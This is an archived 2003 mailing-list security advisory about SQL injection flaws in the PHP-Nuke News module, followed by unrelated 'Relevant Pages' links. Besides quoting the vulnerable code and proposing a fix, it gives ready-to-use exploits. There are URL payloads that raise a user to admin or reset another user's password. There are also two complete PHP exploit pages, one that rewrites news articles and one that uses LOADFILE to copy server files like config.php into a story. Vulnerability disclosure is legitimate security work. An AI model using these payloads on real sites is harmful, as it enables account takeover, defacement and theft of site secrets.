[VulnWatch] PHP-Nuke, 'News' module : Big Security Holes

From: Frog Man (leseulfrog@hotmail.com)
Date: 03/22/03

  • Next message: Vladimir Katalov: "[VulnWatch] Vulnerability (critical): Digital signature for Adobe Acrobat/Reader plug-in can be forged"
    From: "Frog Man" <leseulfrog@hotmail.com>
    To: bugtraq@securityfocus.com
    Date: Sat, 22 Mar 2003 15:13:04 +0100
    
    

    Informations :
    같같같같같같같
    Versions : 5.6, 6.0, 6.5 RC1, 6.5 RC2, 6.5 RC3, 6.5
    Module : News
    Website : http://www.phpnuke.org
    Problem : SQL Injection
    Post Scriptum : No War For Oil !!

    PHP Code/Location :
    같같같같같같같같같
    /modules/News/article.php :

    ------------------------------------------------------------------------

    if (stristr($REQUEST_URI,"mainfile")) {
        Header("Location: modules.php?name=$module_name&file=article&sid=$sid");
    } elseif (!isset($sid) && !isset($tid)) {
        Header("Location: index.php");
    }

    if ($save AND is_user($user)) {
        cookiedecode($user);
        $db->sql_query("UPDATE ".$user_prefix."_users SET umode='$mode',
    uorder='$order', thold='$thold' where uid='$cookie[0]'");
        getusrinfo($user);
        $info =
    base64_encode("$userinfo[user_id]:$userinfo[username]:$userinfo[user_password]:$userinfo[storynum]:$userinfo[umode]:$userinfo[uorder]:$userinfo[thold]:$userinfo[noscore]");
        setcookie("user","$info",time()+$cookieusrtime);
    }
    ------------------------------------------------------------------------

    /modules/News/index.php :

    ------------------------------------------------------------------------
    [...]
    function rate_article($sid, $score) {
        global $prefix, $dbi, $ratecookie, $sitename, $r_options;
        if ($score) {
            if ($score > 5) { $score = 5; }
            if ($score < 1) { $score = 1; }
            if (isset($ratecookie)) {
                $rcookie = base64_decode($ratecookie);
                $r_cookie = explode(":", $rcookie);
            }
            for ($i=0; $i < sizeof($r_cookie); $i++) {
                if ($r_cookie[$i] == $sid) {
                    $a = 1;
                }
            }
            if ($a == 1) {
                Header("Location:
    modules.php?name=News&op=rate_complete&sid=$sid&rated=1");
            } else {
                $result = sql_query("update ".$prefix."_stories set score=score+$score,
    ratings=ratings+1 where sid='$sid'", $dbi);
                $info = base64_encode("$rcookie$sid:");
                setcookie("ratecookie","$info",time()+3600);
                Header("Location:
    modules.php?name=News&op=rate_complete&sid=$sid$r_options");
            }
        } else {
            include("header.php");
            title("$sitename: "._ARTICLERATING."");
            OpenTable();
            echo "<center>"._DIDNTRATE."<br><br>"
                .""._GOBACK."</center>";
            CloseTable();
            include("footer.php");
        }
    }

    [...]

    switch ($op) {

    [...]
        case "rate_article":
        rate_article($sid, $score);
        break;
    [...]

    }

    ?>
    ------------------------------------------------------------------------

    mainfile.php :
    ------------------------------------------------------------------
    [...]
    foreach ($_GET as $secvalue) {
        if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
            (eregi("\.\.", $secvalue)) ||
            (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
            (eregi("\([^>]*\"?[^)]*\)", $secvalue)) ||
            (eregi("\"", $secvalue))) {
            Header("Location: index.php");
            die();
        }
    }

    foreach ($_POST as $secvalue) {
        if (eregi("<[^>]*script*\"?[^>]*>", $secvalue)) {
            Header("Location: index.php");
            die();
        }
    }
    [...]
    ------------------------------------------------------------------

    Exploits :
    같같같같같
    if magic_quotes_gpc=OFF :

    - Change our level (into admin) :
    http://[target]/modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4
    or
    http://[target]/modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4
    or
    http://[target]/modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4

    - Change the Bob's password :
    http://[target]/modules.php?name=News&file=article&sid=1&save=1&order=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*

    if magic_quotes_gpc=OFF AND ON !!

    Change the title, article,... of a news :

    ------------------------------------------------------------------------
    <html>
    <head>
    <title>PHP-Nuke Change News</title>
    </head>
    <body>
    <?
    function ascii_phpnuke_exploit($str) {
    for ($i=0;$i < strlen($str);$i++) {
    if ($i == strlen($str)-1){
    $ascii_char.=ord(substr($str,$i));
    }else{
    $ascii_char.=ord(substr($str,$i)).',';
    }
    }
    return $ascii_char;
    }

    if (isset($submit)) {

    $score="1";
    if (isset($title)) {
    $score.=", title=char(".ascii_phpnuke_exploit($title).")";
    }
    if (strlen($hometext)>1) {
    $score.=", hometext=char(".ascii_phpnuke_exploit($hometext).")";
    }
    if (strlen($bodytext)>1){
    $score.=", bodytext=char(".ascii_phpnuke_exploit($bodytext).")";
    }
    ?>

    <b>Target URL : </b><? echo $target; ?><br><br>
    <b>SID : </b><? echo $sid; ?><br><br>
    <b>New Title : </b><? echo $title; ?><br><br>
    <b>New Story Text : </b><? echo $hometext; ?><br><br>
    <b>New Extended Text : </b><? echo $bodytext; ?><br><br>

    <form method="POST" action="<? echo $target; ?>/modules.php">
    <input type="hidden" name="name" value="News">
    <input type="hidden" name="op" value="rate_article">
    <input type="hidden" name="sid" value="<? echo $sid; ?>">
    <input type="hidden" name="score" value="<? echo $score; ?>">
    <input type="submit" name="submit" value="Change the News">
    </form>
    <input type="submit" value="Back" onclick="history.go(-1)">

    <?
    }else{
    ?>

    <form method="GET" action="<? echo $PHP_SELF; ?>">
    Target URL : <input type="text" name="target"><br>
    News SID : <input type="text" name="sid"><br><br>
    <b>New Title :</b><br> <input type="text" name="title"><br>
    <br><br><b>New Story Text :</b><br><textarea cols="50" rows="12"
    name="hometext"></textarea>
    <br><br><br><b>New Extended Text : </b><br><textarea cols="50" rows="12"
    name="bodytext"></textarea><br><br>
    <input type="submit" name="submit" value="Preview">
    </form>

    <?
    }
    ?>

    </body>
    </html>
    ------------------------------------------------------------------------

    Save a file from the HD, like 'config.php' into a news :

    ------------------------------------------------------------------------
    <html>
    <head>
    <title>PHP-Nuke View File</title>
    </head>
    <body>
    <?
    function ascii_phpnuke_exploit($str) {
    for ($i=0;$i < strlen($str);$i++) {
    if ($i == strlen($str)-1){
    $ascii_char.=ord(substr($str,$i));
    }else{
    $ascii_char.=ord(substr($str,$i)).',';
    }
    }
    return $ascii_char;
    }

    if (isset($submit)) {

    $score="1";

    if (isset($hometext)) {
    $score.=", hometext=LOADFILE(char(".ascii_phpnuke_exploit($hometext)."))";
    }
    if (isset($bodytext)){
    $score.=", bodytext=LOADFILE(char(".ascii_phpnuke_exploit($bodytext)."))";
    }
    ?>

    <b>Target URL : </b><? echo $target; ?><br><br>
    <b>SID : </b><? echo $sid; ?><br><br>
    <b>File In Story Text : </b><? echo $hometext; ?><br><br>
    <b>File In Extended Text : </b><? echo $bodytext; ?><br><br>

    <form method="POST" action="<? echo $target; ?>/modules.php">
    <input type="hidden" name="name" value="News">
    <input type="hidden" name="op" value="rate_article">
    <input type="hidden" name="sid" value="<? echo $sid; ?>">
    <input type="hidden" name="score" value="<? echo $score; ?>">
    <input type="submit" name="submit" value="Change the News">
    </form>
    <input type="submit" value="Back" onclick="history.go(-1)">

    <?
    }else{
    ?>

    <form method="GET" action="<? echo $PHP_SELF; ?>">
    Target URL : <input type="text" name="target"><br>
    News SID : <input type="text" name="sid"><br><br>
    <br><br><b>File In Story Text (Full Path) :</b><br><input name="hometext">
    <br><br><br><b>File In Extended Text (Full Path) : </b><br><input
    name="bodytext"><br><br>
    <input type="submit" name="submit" value="Preview">
    </form>

    <?
    }
    ?>

    </body>
    </html>
    ------------------------------------------------------------------------

    The complete file can be found, for example at :
    http://[target]/modules/News/comments.php

    Solution :
    같같같같같
    Into mainfile.php, replace :

    ------------------------------------------------------------------
    [...]
    foreach ($_GET as $secvalue) {
        if ((eregi("<[^>]*script*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*object*\"?[^>]*>", $secvalue)) ||
            (eregi("\.\.", $secvalue)) ||
            (eregi("<[^>]*iframe*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*applet*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*meta*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*style*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*form*\"?[^>]*>", $secvalue)) ||
            (eregi("<[^>]*img*\"?[^>]*>", $secvalue)) ||
            (eregi("\([^>]*\"?[^)]*\)", $secvalue)) ||
            (eregi("\"", $secvalue))) {
            Header("Location: index.php");
            die();
        }
    }

    foreach ($_POST as $secvalue) {
        if (eregi("<[^>]*script*\"?[^>]*>", $secvalue)) {
            Header("Location: index.php");
            die();
        }
    }
    [...]
    ------------------------------------------------------------------

    by :

    --------------------------------------------------------------------------------------------------------------
    foreach ($_REQUEST as $key=>$value) {

        if (get_magic_quotes_gpc()==0) {
            $value = addslashes($value); // This will reproduce the option
    magic_quotes_gpc=1
        }

        $value =
    str_replace(array(')','=','<','>','|'),array('&#41;','&#61;','&#60;','&#62;','&#124;'),$value);

        ${$key} = $value;
        $_REQUEST[$key] = $value;
        if (isset($_POST[$key])) { $_POST[$key] = $value; }
        if (isset($_COOKIE[$key])) { $_COOKIE[$key] = $value; }
        if (isset($_FILE[$key])) { $_FILE[$key] = $value; }
        if (isset($_GET[$key])) { $_GET[$key] = $value; }
        if (isset($HTTP_POST_VARS[$key])) { $HTTP_POST_VARS[$key] = $value; }
        if (isset($HTTP_COOKIE_VARS[$key])) { $HTTP_COOKIE_VARS[$key] = $value;
    }
        if (isset($HTTP_FILE_VARS[$key])) { $HTTP_FILE_VARS[$key] = $value; }
        if (isset($HTTP_GET_VARS[$key])) { $HTTP_GET_VARS[$key] = $value; }
    }
    --------------------------------------------------------------------------------------------------------------

    A patch can be found on http://www.phpsecure.info

    More Details in French :
    같같같같같같같같같같같같
    http://www.frog-man.org/tutos/PHP-Nuke-News.txt

    Credits :
    같같같같
    frog-m@n
    http://www.phpsecure.info

    _________________________________________________________________
    MSN Messenger : discutez en direct avec vos amis !
    http://messenger.fr.msn.be


  • Next message: Vladimir Katalov: "[VulnWatch] Vulnerability (critical): Digital signature for Adobe Acrobat/Reader plug-in can be forged"

    Relevant Pages

    • The Phantom Tollbooth October Press Release
      ... The Phantom Tollbooth Press Release ... The news is cycling so fast ... Brian "Head" Welch - Save Me From Myself ... David Crowder Band - Remedy Club Tour CD/DVD ...
      (rec.music.christian)
    • Re: Women to Avoid (for men)
      ... Women to Avoid ... Don't date a woman who thinks current events in the news ... crowbar to get inside your head. ... Don't have sex with a woman who just sits or lays there ...
      (soc.men)
    • Re: Recycler Folder in XP Pro
      ... My News Server, msnews.microsoft.com, has nothing to do with it. ... Consider that you are posting using Outlook Express formatted in HTML. ... support HTML can read the formatting. ... the message is displayed as plain text ...
      (microsoft.public.windowsxp.help_and_support)
    • I am alive and still kicking
      ... Trying to get my head on straight before I ... Jammer is a little shit. ... Ok here is my good news and bad news. ... Saturday to the normal flu. ...
      (rec.pets.cats.anecdotes)